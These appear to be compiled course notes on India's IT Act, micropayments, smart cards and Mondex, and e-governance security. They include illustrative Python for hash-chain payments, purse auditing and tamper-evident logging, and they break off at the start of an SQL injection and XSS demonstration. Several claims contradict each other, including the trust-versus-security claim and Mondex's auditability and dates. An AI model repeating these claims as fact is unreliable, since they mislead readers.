The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences

Section 65: Tampering with computer source documents, i.e. intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years or/and fine up to 2 lakh rupees.

Section 66: Hacking. Punishment: imprisonment up to three years or/and fine up to 5 lakh rupees.

Section 66-A: Sending offensive messages through electronic means, i.e. sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as micropayment, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based) and PayWord (post-payment).

MICRO PAYMENT IS:
• Very small payments made over the Web
• Transactions too small for credit cards
• Can be as little as a fraction of a cent
• An alternative to subscription and advertising
• Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange

for something made available online such as an application download a service or Web-based

content

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a

fraction of a cent A special type of system is required for such payments which are too small to

be feasible for processing through credit card companies

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider, who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
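The notes name PayWord as a post-payment scheme and describe a third-party provider that accumulates micropayments and settles them as one larger payment. The following is an added example, written for these notes and not taken from the PayWord paper or any product: a hash-chain purse in which the user commits to the root of a chain, each payment reveals the next link, the seller verifies it with a single hash, and the broker settles the accumulated count in one transfer. The Broker, User and Seller classes, the chain length, and the use of an HMAC as a stand-in for the broker's signature are all assumptions made for the illustration.

```python
import hashlib
import hmac
import os


def h(data: bytes) -> bytes:
    """One link of the hash chain (SHA-256)."""
    return hashlib.sha256(data).digest()


class Broker:
    """Third-party provider: holds user and seller accounts and settles the
    accumulated paywords in one larger transfer."""

    def __init__(self):
        # Assumed: a symmetric key stands in for the broker's signing key so
        # that the example needs only the standard library.
        self._key = os.urandom(32)
        self.balances = {}
        self.redeemed = {}   # (user, root, seller) -> last payword already paid out

    def open_account(self, name, deposit):
        self.balances[name] = deposit

    def certify(self, user, root):
        """Bind the user's chain root w_0 to the user so sellers can trust it."""
        tag = hmac.new(self._key, user.encode() + root, hashlib.sha256).digest()
        return (user, root, tag)

    def redeem(self, seller, cert, last_payword, count, unit):
        """Settle `count` paywords: hashing the last one `count` times must land
        exactly on the point up to which this chain was already settled."""
        user, root, tag = cert
        good = hmac.new(self._key, user.encode() + root, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, good):
            raise ValueError("certificate was not issued by this broker")
        anchor = self.redeemed.get((user, root, seller), root)
        w = last_payword
        for _ in range(count):
            w = h(w)
        if w != anchor:   # also blocks a seller re-submitting an old claim
            raise ValueError("claim does not continue the chain from the last settlement")
        amount = count * unit
        if self.balances.get(user, 0) < amount:
            raise ValueError("user account cannot cover the claim")
        self.balances[user] -= amount
        self.balances[seller] = self.balances.get(seller, 0) + amount
        self.redeemed[(user, root, seller)] = last_payword
        return amount


class User:
    """Builds w_n = random, w_i = h(w_{i+1}); commits to w_0 and spends w_1, w_2, ..."""

    def __init__(self, name, broker, chain_len):
        self.name = name
        chain = [os.urandom(32)]             # w_n
        for _ in range(chain_len):
            chain.append(h(chain[-1]))
        chain.reverse()                       # chain[0] = w_0 (root) ... chain[n] = w_n
        self.chain = chain
        self.cert = broker.certify(name, chain[0])
        self.spent = 0

    def pay(self):
        if self.spent >= len(self.chain) - 1:
            raise ValueError("chain exhausted; commit to a fresh chain")
        self.spent += 1
        return self.chain[self.spent]


class Seller:
    """Verifies each payword with one hash and contacts the broker only to settle."""

    def __init__(self, name, unit):
        self.name, self.unit = name, unit
        self.sessions = {}   # user -> (last accepted payword, unsettled count)

    def accept(self, cert, payword):
        user, root, _ = cert
        last, count = self.sessions.get(user, (root, 0))
        if h(payword) != last:        # forged, replayed or out-of-order payword
            return False
        self.sessions[user] = (payword, count + 1)
        return True

    def settle(self, broker, cert):
        """Turn the accumulated paywords into one credit at the broker."""
        user = cert[0]
        last, count = self.sessions.get(user, (cert[1], 0))
        if count == 0:
            return 0
        amount = broker.redeem(self.name, cert, last, count, self.unit)
        self.sessions[user] = (last, 0)   # later paywords continue the same chain
        return amount
```

The security property to notice is asymmetry of cost: the seller spends one hash per payment and never talks to the broker until settlement, while a forger would have to invert the hash to produce the next link. In a real deployment the seller would check a public-key signature on the certificate rather than trusting it; the HMAC here is only checkable by the broker, which is why the broker re-verifies it at settlement.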

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than trust is security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore, the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and MasterCard SecureCode).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing
Marketing
Software
Entertainment
Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it
Two types:
  Memory-only chips
  Microprocessor chips
Can hold up to 32,000 bytes
Newer smart cards have math co-processors
Perform complex encryption routines quickly
In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -

(Construction diagrams not reproduced in this transcript)

Why Smart Cards -

Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats

Advantages -

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card (figure not reproduced in this transcript)

Smart card Processing (figure not reproduced in this transcript)

Smart Card Applications -

Ticketless travel
  Seoul bus system: 4M cards, 1B transactions since 1996
  Planned for the SF Bay Area system
Authentication, ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
  Licenses
Mall parking
Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records
Password protection and "lock card" functions
Portable balance finder to check balance
Support for multiple currencies

ADVANTAGES

CONSUMER -

Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT -

Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online
o a rolling record of 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
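The two properties discussed above, offline card-to-card value transfer and a bounded on-card transaction log that overflows before the bank can retrieve it, can be modelled directly. The following is an added example for these notes, not Mondex code: the Purse class, the 10-entry rolling log (the size the privacy notes above give), and the audit() reconciliation the bank might run over uploaded logs are all assumptions made for the illustration. The reconciliation shows what a defender can still detect after overflow: a credit on one card with no matching debit on the other.

```python
from collections import Counter, deque

LOG_SIZE = 10  # assumed: the card keeps a rolling record of its last 10 transactions


class Purse:
    """Stored-value card with a bounded on-card transaction log."""

    def __init__(self, card_id: str, balance: int = 0, log_size: int = LOG_SIZE):
        self.card_id = card_id
        self.balance = balance
        self.log = deque(maxlen=log_size)
        self.seq = 0
        self.overwritten = 0  # records lost to overflow since the last upload

    def _record(self, kind: str, counterparty: str, amount: int) -> None:
        if len(self.log) == self.log.maxlen:
            self.overwritten += 1          # oldest entry is about to be dropped
        self.seq += 1
        self.log.append((self.seq, kind, counterparty, amount))

    def pay(self, payee: "Purse", amount: int) -> None:
        """Offline card-to-card transfer: no bank is involved, value moves
        between the two purses and each card records only its own side."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("invalid amount")
        self.balance -= amount
        payee.balance += amount
        self._record("debit", payee.card_id, amount)
        payee._record("credit", self.card_id, amount)

    def upload(self):
        """What the bank receives when the card next goes online: the surviving
        records and how many were already overwritten."""
        records, lost = list(self.log), self.overwritten
        self.log.clear()
        self.overwritten = 0
        return records, lost


def audit(uploads: dict) -> Counter:
    """Pair every debit with the matching credit across all uploaded logs.
    Returns the (payer, payee, amount) triples left without a counterpart;
    a non-empty result means a record was lost before it could be retrieved."""
    debits, credits = Counter(), Counter()
    for card_id, records in uploads.items():
        for _, kind, other, amount in records:
            if kind == "debit":
                debits[(card_id, other, amount)] += 1
            else:
                credits[(other, card_id, amount)] += 1
    return (debits - credits) + (credits - debits)


def float_is_conserved(purses, issued: int) -> bool:
    """Total value across all purses must equal what the issuer loaded."""
    return sum(p.balance for p in purses) == issued
```

Running twelve one-unit payments from one card to two others leaves the payer's log holding only the last ten, so two of its debits are gone by upload time; the audit still surfaces the gap because the payees' credits have nothing to pair with. That is the asymmetry the critics point to: value is conserved, but the evidence needed to attribute a disputed transaction is not.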

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with treating this as a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had a mammoth state wide area network in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference from too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

(Architecture diagram not reproduced in this transcript)

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and operating system independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving
  - Long Term Contracts
  - User Charges and/or Payments flowing between the Parties
  - Shared Investments, but Mainly Private
  - Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition: For and In the Market

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals
Shared resources (time, money, expertise, people)
Shared risks
Shared benefits

Benefits

Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital

Two Major Steps

Crafting the Partnership
Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis
  What's the need?
  What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
  Is there a need for a Public/Private Partnership?
  Preliminary Project Definition

Feasibility
  Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  Market Research
  Economic/Financial Analysis
  Program, Budget and Schedule
  Risk Analysis

Plan and Test
  Final project definition
  What is the best way to complete the project?
  Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
  Master Schedule/Budget
  Political Climate
  Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
  How do you choose and contract with the best-value private partner?
  What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  What do current statutes allow?
  Procurement Approach: Sole Source, RFP, Low Bid
  Risk Allocation between Public and Private Partners
  Structuring of Contract/Risks and Rewards

Implement
  Environmental
  Design
  Permitting
  Construction
  Commissioning and Administration

Operate
  Startup
  Monitoring
  Assessment
  Enhancement
  Contract Modifications
  Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, with the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and is thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
monitoring and reviewing the performance and effectiveness of the ISMS;
continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what they are trying to do.
Confidentiality: the capability to prevent unauthorized access to information.
Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
Non-repudiation: the capability to prevent a person or system that intervened in an event or action from denying or challenging their participation in the event.
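The requirements just listed are easier to see working together than in isolation. The following is an added example written for these notes, not code from any e-Government system: a small citizen-record service that authenticates callers against salted PBKDF2 password hashes, authorizes each action by role, and records every decision in an append-only log whose entries are chained and HMAC-authenticated so that later edits, deletions or reordering are detectable. The service name, the two roles, the account data and the log format are assumptions made for the illustration.

```python
import hashlib
import hmac
import json
import os
import time

GENESIS = "0" * 64   # previous-tag value for the first entry


class AuditLog:
    """Append-only log for traceability: each entry carries the tag of the
    previous one, and every entry is HMAC-authenticated under the log key."""

    def __init__(self, key: bytes):
        self._key = key
        self.entries = []

    def _tag(self, body: dict) -> str:
        canonical = json.dumps(body, sort_keys=True).encode()
        return hmac.new(self._key, canonical, hashlib.sha256).hexdigest()

    def append(self, actor: str, action: str, resource: str) -> None:
        prev = self.entries[-1]["tag"] if self.entries else GENESIS
        body = {"seq": len(self.entries), "time": time.time(), "actor": actor,
                "action": action, "resource": resource, "prev": prev}
        self.entries.append({**body, "tag": self._tag(body)})

    def verify(self) -> bool:
        """Recompute the chain; any edited, dropped or reordered entry breaks it."""
        prev = GENESIS
        for i, entry in enumerate(self.entries):
            body = {k: v for k, v in entry.items() if k != "tag"}
            if body["seq"] != i or body["prev"] != prev:
                return False
            if not hmac.compare_digest(self._tag(body), entry["tag"]):
                return False
            prev = entry["tag"]
        return True


class CitizenRecordService:
    """Authenticates callers, authorizes by role, and logs every decision."""

    ROLES = {"clerk": {"read"}, "officer": {"read", "update"}}   # assumed roles
    ITERATIONS = 100_000

    def __init__(self, accounts: dict, log: AuditLog):
        # accounts: name -> (role, password); only salted PBKDF2 hashes are kept.
        self._creds = {}
        for name, (role, password) in accounts.items():
            salt = os.urandom(16)
            self._creds[name] = (role, salt, self._derive(password, salt))
        self.log = log

    def _derive(self, password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS)

    def request(self, name: str, password: str, action: str, resource: str) -> bool:
        # Unknown users still go through a derivation so that the response time
        # does not reveal which account names exist.
        role, salt, stored = self._creds.get(name, ("", b"\x00" * 16, b""))
        presented = self._derive(password, salt)
        if not (stored and hmac.compare_digest(presented, stored)):
            self.log.append(name, "auth-failure", resource)      # authentication
            return False
        if action not in self.ROLES.get(role, set()):
            self.log.append(name, "denied:" + action, resource)  # authorization
            return False
        self.log.append(name, action, resource)                  # traceability
        return True
```

One caveat that maps onto the requirement list: an HMAC gives integrity and traceability to whoever holds the key, but not non-repudiation toward a third party, because the key holder could have written any entry. Non-repudiation needs each actor's action to be signed with a key only that actor controls; the log structure stays the same, only the tag changes.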

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units
Protecting software applications used to process personal data
Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constituting a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness
Continually improve its control environment
Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
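Both vulnerabilities named above come down to the same mistake, user input being spliced into a language (SQL or HTML) that then interprets it, and both have the same kind of fix. The following is an added example written for these notes, not code from any of the surveyed sites: a lookup endpoint in its vulnerable and hardened forms, and a page renderer in its vulnerable and hardened forms, against a constructed in-memory table. The table, the sample rows and the function names are assumptions made for the illustration; the test input is the standard one a reviewer would use to confirm the fix holds.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, tax_id TEXT)")
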